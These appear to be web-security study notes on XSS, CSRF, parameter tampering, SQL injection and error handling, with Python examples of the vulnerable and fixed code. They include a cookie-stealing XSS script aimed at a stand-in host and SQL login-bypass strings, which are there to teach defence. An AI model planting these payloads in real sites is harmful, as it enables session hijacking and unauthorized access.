- Cross-site scripting (XSS): the ability to make the user-agent (e.g. the browser) run attacker-supplied script while in the context of the vulnerable application, so the script runs with that site's cookies and DOM access. There are three types of cross-site scripting attacks:
- Stored: e.g. a bulletin board or auction posting, where users submit comments that are later viewed by others. Malicious JavaScript can be submitted instead of plain text. E.g. a user can fill out an auction listing for an item and include the following script at the bottom of the description:

  <script language="javascript">
  document.write('<img src="http://localhost/?url=' + document.location + '&cookie=' + document.cookie + '">');
  </script>

  The script inserts HTML into the page that looks like a regular image tag, but the image request carries the current user's cookie value in its query string. Every other user who views the posting sends their cookie to the web server named in the script (localhost here stands in for the attacker's host). The attacker can then replay the cookie to impersonate those users on the vulnerable site.
- Reflected: the script arrives in the request (e.g. a URL parameter) and is echoed straight back in the response; typically used in conjunction with phishing, where the victim is tricked into clicking the crafted link.
- Stored and reflected attacks can be stopped by making sure the application never echoes back user-supplied input without validating it and output-encoding it for the context it is written into (HTML body, attribute, JavaScript, URL).
- DOM-based: e.g. the PDF attacks. The malicious input never reaches the application server; client-side script on the page reads attacker-controlled data (such as document.location) and writes it into the DOM. Server-side filtering therefore cannot stop these; the fix has to be made in the client-side code itself.

3.1.6: Cross Site Request Forgery (CSRF)
- Forces a logged-on victim's browser to send a request to a vulnerable web application, which then performs the chosen action on behalf of the victim. Applications with the following characteristics are at risk:
- Has no authorization checks for vulnerable actions.
- Processes an action if a default login is given in the request (e.g. credentials passed as request parameters).
- Authorizes requests based only on credentials that are automatically submitted, such as the session cookie, if the user is currently logged into the web application.
- CSRF works because the user's authorization credential is automatically included in the request by the browser, even though the attacker never supplied (or knew) that credential. The defence is to require a secret the browser does not send automatically, e.g. a per-session anti-CSRF token in every state-changing form, and to reject requests that lack it.

3.1.7: 3rd party misconfiguration
- Companies partner with 3rd party products; as part of the business model, access must be granted to sensitive data. Without security attention to this data, organizations are at risk.
- E.g. an attacker can create files on the server if NFS permissions are granted too broadly (world-writable exports).

3.1.8: Parameter Tampering
- Involves manipulation of URL parameters to retrieve information which is otherwise not available to the user, e.g. changing an ID in the URI to retrieve more (or someone else's) data than expected.
- Other tamperable inputs include form fields (hidden fields included), internal module selectors and attribute parameters that categorize the behaviour of the application.
- Cookies, HTTP headers and query strings can all be tampered with. A cookie's Secure flag only protects it in transit (HTTPS only); it does not stop the client from modifying the value, so anything the server stores client-side (prices, roles, IDs) must be re-validated on every request. Form fields can be changed just as easily.

3.1.9: SQL Injection
- Exploits knowledge, or educated guesses, about the server-side technology driving the application.
- The attacker inserts SQL commands into a form field instead of legitimate data: they find a parameter that the application passes to the database, embed malicious SQL in the content of that parameter, and trick the web application into forwarding the modified query to the database.
- This can give unauthorized access to, corrupt, or damage the database.
- Shell (OS) commands built from request data produce the same kind of injection attack; anything passed from the HTTP request into a command or query needs to be carefully validated, and database queries should use parameterised statements rather than string concatenation.

3.1.10: Forceful browsing
- Directly accessing a page that should not be shown to the user, or which is not linked for public access, by editing the URL in the browser to reach files that are not intended to be public.
- E.g. skipping the login and registration pages to get to the pages behind them. Every page must enforce authorization server-side; not linking to a page is not access control.

3.1.11: Improper error handling
- Detailed internal error messages are revealed to the user, such as database dumps, stack traces or SQL fragments, which tell an attacker how the application is built. The client should get a generic message (with a reference ID); the details belong in the server-side log.
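The stored XSS case described above, worked through as an added example (not code from the original notes). It uses the notes' cookie-stealing payload, stored in a constructed in-memory list that stands in for the auction database, and renders the posting once the vulnerable way and once with context-aware output encoding; all names (POSTINGS, render_vulnerable, render_safe) are assumptions for this example.

```python
"""Stored XSS: rendering a user-submitted auction description two ways.

Added example, not part of the original notes. The payload is the one quoted
in the notes; POSTINGS is a constructed stand-in for the bulletin board.
"""
import html
import urllib.parse

# Constructed: the description an attacker submits (payload from the notes).
ATTACKER_DESCRIPTION = (
    "Vintage radio, works great."
    "<script language=\"javascript\">"
    "document.write('<img src=\"http://localhost/?url=' + document.location"
    " + '&cookie=' + document.cookie + '\">');"
    "</script>"
)

# Constructed storage: what every later viewer of the board will be served.
POSTINGS = [
    {"id": 1, "seller": "alice", "description": "Garden chairs, set of four."},
    {"id": 2, "seller": "mallory", "description": ATTACKER_DESCRIPTION},
]

# One template, three different output contexts: HTML body, HTML body, URL inside an attribute.
PAGE_TEMPLATE = (
    "<h2>Item #{id}</h2>\n"
    "<p>Seller: {seller}</p>\n"
    "<div class=\"description\">{description}</div>\n"
    "<a href=\"/search?seller={seller_q}\">More from this seller</a>"
)


def render_vulnerable(posting):
    """Echo the stored input straight into the HTML body: the stored XSS."""
    return PAGE_TEMPLATE.format(
        id=posting["id"],
        seller=posting["seller"],
        description=posting["description"],
        seller_q=posting["seller"],
    )


def render_safe(posting):
    """Encode every user-controlled value for the context it lands in.

    html.escape(quote=True) neutralises <, >, &, " and ' for the HTML body and
    quoted attributes. A value written into a URL query string is first
    percent-encoded so 'a&b=c' cannot smuggle in a second parameter, then
    HTML-escaped because the URL sits inside an attribute.
    """
    seller = posting["seller"]
    return PAGE_TEMPLATE.format(
        id=int(posting["id"]),  # force the type; an int cannot carry markup
        seller=html.escape(seller, quote=True),
        description=html.escape(posting["description"], quote=True),
        seller_q=html.escape(urllib.parse.quote(seller, safe=""), quote=True),
    )


def contains_active_script(rendered_html):
    """Crude check: does a real <script> tag survive in the rendered page?
    (An escaped one appears as &lt;script and is shown as text, not run.)"""
    return "<script" in rendered_html.lower()


if __name__ == "__main__":
    evil = POSTINGS[1]
    print(render_vulnerable(evil))  # <script> reaches every viewer's browser
    print()
    print(render_safe(evil))        # same text, displayed literally and inert
```

The encoded page still shows the attacker's text (including the words document.cookie), which is the point: encoding preserves the content and only removes its ability to execute. Marking the session cookie HttpOnly would stop this particular payload from reading document.cookie, but it does nothing against the script running other actions in the victim's session, so it is a complement to output encoding, not a substitute.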
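For 3.1.6, an added example (not from the original notes) of the synchronizer-token check that closes the "authorizes on the session cookie alone" gap. SESSIONS, BALANCES, the Request dataclass and the /transfer handlers are constructed stand-ins for a web framework; the forged request models an auto-submitting form on an attacker's page, to which the browser attaches the victim's cookie.

```python
"""CSRF: the synchronizer-token check a state-changing endpoint needs.

Added example, not from the original notes. Session store, request objects
and the transfer endpoint are constructed stand-ins for a real framework.
"""
import hmac
import secrets
from dataclasses import dataclass, field

# Constructed server-side state: session id -> session data, and account balances.
SESSIONS = {}
BALANCES = {"victim": 1000, "attacker": 0}


@dataclass
class Request:
    """Only the parts of an HTTP request the endpoint cares about."""
    cookies: dict
    form: dict = field(default_factory=dict)


def login(user):
    """Create a session and mint a per-session anti-CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32)}
    return sid


def render_transfer_form(sid):
    """The legitimate page embeds the token in a hidden field."""
    token = SESSIONS[sid]["csrf_token"]
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')


def transfer_vulnerable(req):
    """Authorizes on the automatically-sent cookie alone: the at-risk pattern."""
    session = SESSIONS.get(req.cookies.get("sid"))
    if session is None:
        return 401, "not logged in"
    return _do_transfer(session["user"], req.form)


def transfer_protected(req):
    """Same endpoint, but also demands the token the browser never sends on
    its own; a cross-site forged request cannot include it."""
    session = SESSIONS.get(req.cookies.get("sid"))
    if session is None:
        return 401, "not logged in"
    supplied = req.form.get("csrf_token", "")
    # Constant-time comparison on bytes (compare_digest rejects non-ASCII str).
    if not hmac.compare_digest(supplied.encode(), session["csrf_token"].encode()):
        return 403, "missing or invalid CSRF token"
    return _do_transfer(session["user"], req.form)


def _do_transfer(user, form):
    amount = int(form["amount"])
    to = form["to"]
    if amount <= 0 or BALANCES.get(user, 0) < amount or to not in BALANCES:
        return 400, "bad transfer"
    BALANCES[user] -= amount
    BALANCES[to] += amount
    return 200, f"moved {amount} from {user} to {to}"


def forged_request(sid):
    """What an attacker page's auto-submitting form produces: the browser
    attaches the victim's cookie, but the attacker cannot know the token."""
    return Request(cookies={"sid": sid}, form={"to": "attacker", "amount": "500"})


def legitimate_request(sid):
    """A submission of the real form, token included."""
    return Request(cookies={"sid": sid},
                   form={"to": "attacker", "amount": "10",
                         "csrf_token": SESSIONS[sid]["csrf_token"]})


def run_scenario():
    """Log the victim in, fire the forged request at both endpoints, then a
    genuine one. Returns the three status codes and the victim's balance."""
    BALANCES.update({"victim": 1000, "attacker": 0})
    sid = login("victim")
    forged = transfer_vulnerable(forged_request(sid))[0]      # 200: money moved
    blocked = transfer_protected(forged_request(sid))[0]      # 403: no token
    genuine = transfer_protected(legitimate_request(sid))[0]  # 200: token present
    return forged, blocked, genuine, BALANCES["victim"]


if __name__ == "__main__":
    print(run_scenario())
```

The token has to be unpredictable (secrets, not random) and compared in constant time; tying it to the session rather than to a single form keeps the check simple while still denying anything the browser sent without the page's cooperation.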
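For 3.1.8 and 3.1.10 together, an added example (not from the original notes) of the server-side authorization that both defeat when it is missing: an object-ownership check on a tampered id parameter, recomputing a price the client tried to post, and a role check on an admin page that is never linked from the UI. USERS, INVOICES, CATALOG, the Request dataclass and the route table are constructed for this example.

```python
"""Parameter tampering and forceful browsing: authorize every request
server-side, whatever the UI links to or what the client posted.

Added example, not from the original notes. Users, records and routes are
constructed; a real application wires these checks into its framework.
"""
from dataclasses import dataclass
from typing import Optional

# Constructed users, records and a server-side price list.
USERS = {"alice": {"role": "user"}, "bob": {"role": "user"}, "root": {"role": "admin"}}
INVOICES = {101: {"owner": "alice", "total": 120}, 102: {"owner": "bob", "total": 75}}
CATALOG = {"sku-1": 40, "sku-2": 15}


@dataclass
class Request:
    user: Optional[str]  # principal from the authenticated session, None if anonymous
    path: str
    params: dict         # query string or form fields, all attacker-controlled


def _int_param(params, name, default=None):
    try:
        return int(params.get(name, default))
    except (TypeError, ValueError):
        return None


def view_invoice_vulnerable(req):
    """Trusts the id parameter: alice reads invoice 102 by editing the URL."""
    inv = INVOICES.get(_int_param(req.params, "id"))
    return (200, inv) if inv else (404, None)


def view_invoice(req):
    """Object-level check: the record must belong to the caller."""
    if req.user is None:
        return 401, None
    inv = INVOICES.get(_int_param(req.params, "id"))
    if inv is None or inv["owner"] != req.user:
        return 403, None  # same answer for 'not yours' and 'does not exist'
    return 200, inv


def checkout(req):
    """A hidden 'price' field can be edited; recompute from the catalog."""
    if req.user is None:
        return 401, None
    sku, qty = req.params.get("sku"), _int_param(req.params, "qty", 1)
    if sku not in CATALOG or qty is None or qty <= 0:
        return 400, None
    return 200, {"sku": sku, "charged": CATALOG[sku] * qty}


def admin_report(req):
    """Not linked anywhere in the UI, but guarded by a role check anyway."""
    if req.user is None:
        return 401, None
    if USERS.get(req.user, {}).get("role") != "admin":
        return 403, None
    return 200, {"invoices": len(INVOICES)}


ROUTES = {"/invoice": view_invoice, "/checkout": checkout, "/admin/report": admin_report}


def dispatch(req):
    """Every route runs its own authorization check; unknown paths get a
    plain 404 rather than a listing or a stack trace."""
    handler = ROUTES.get(req.path)
    return handler(req) if handler else (404, None)


if __name__ == "__main__":
    print(view_invoice_vulnerable(Request("alice", "/invoice", {"id": "102"})))  # (200, bob's invoice)
    print(dispatch(Request("alice", "/invoice", {"id": "102"})))                 # (403, None)
    print(dispatch(Request("alice", "/checkout", {"sku": "sku-1", "qty": "2", "price": "1"})))
    print(dispatch(Request("bob", "/admin/report", {})))                         # (403, None)
```

Returning 403 for both "not yours" and "no such record" in view_invoice avoids turning the id parameter into an oracle for which invoice numbers exist.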
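For 3.1.9 and 3.1.11 together, an added example (not from the original notes) of a login query built by string concatenation beside its parameterised form, with the error-handling difference shown on the same endpoint: the vulnerable version echoes the database error and the failing SQL to the client, the hardened one logs it and returns only a reference id. The in-memory SQLite table, its users and the payloads are constructed; passwords are stored in plaintext purely to keep the injection visible and would be hashed in a real system.

```python
"""SQL injection and improper error handling, side by side.

Added example, not from the original notes. Uses an in-memory SQLite table
with constructed users; 'logger' stands in for the server-side log.
"""
import logging
import sqlite3
import uuid

logger = logging.getLogger("app")

# Constructed injection payloads used below.
BYPASS = "' OR '1'='1' --"                               # true for every row
PROBE = "x' AND 1=(SELECT 1 FROM nonexistent_table) --"  # forces a DB error


def make_db():
    """Constructed users table (plaintext passwords only for the demo)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Concatenates user input into SQL and returns DB errors to the client."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Improper error handling: internals and the query text leak out.
        return 500, f"Database error: {exc} in query: {sql}"
    return (200, f"welcome {row[0]}") if row else (401, "bad credentials")


def login_safe(conn, username, password):
    """Parameterised query; input can only ever be data, never SQL.
    On failure, log the detail server-side and hand the client a reference."""
    try:
        row = conn.execute(
            "SELECT username FROM users WHERE username = ? AND password = ?",
            (username, password),
        ).fetchone()
    except sqlite3.Error:
        ref = uuid.uuid4().hex[:8]
        logger.exception("login query failed, ref=%s", ref)  # trace stays in the log
        return 500, f"Internal error (reference {ref})"
    return (200, f"welcome {row[0]}") if row else (401, "bad credentials")


def run_scenario():
    """Exercise both endpoints with a real login, the bypass, and the probe.
    Returns the status codes plus whether each 500 message leaks 'SELECT'."""
    conn = make_db()
    genuine = login_safe(conn, "alice", "correct horse")[0]          # 200
    bypass_vuln = login_vulnerable(conn, BYPASS, "anything")[0]      # 200: logged in as alice
    bypass_safe = login_safe(conn, BYPASS, "anything")[0]            # 401: treated as a literal
    status_v, msg_v = login_vulnerable(conn, PROBE, "x")             # 500 with SQL in the message
    status_s, msg_s = login_safe(conn, PROBE, "x")                   # 401: the probe is just a string
    return {
        "genuine": genuine,
        "bypass_vulnerable": bypass_vuln,
        "bypass_safe": bypass_safe,
        "probe_vulnerable": (status_v, "SELECT" in msg_v),
        "probe_safe": (status_s, "SELECT" in msg_s),
    }


if __name__ == "__main__":
    for key, value in run_scenario().items():
        print(f"{key}: {value}")
```

With parameters bound by the driver, the probe payload never becomes SQL, so the hardened endpoint does not even reach the error path for it; the except branch exists for genuine failures (database down, schema drift), where the reference id lets an operator find the full traceback in the log without the client ever seeing it.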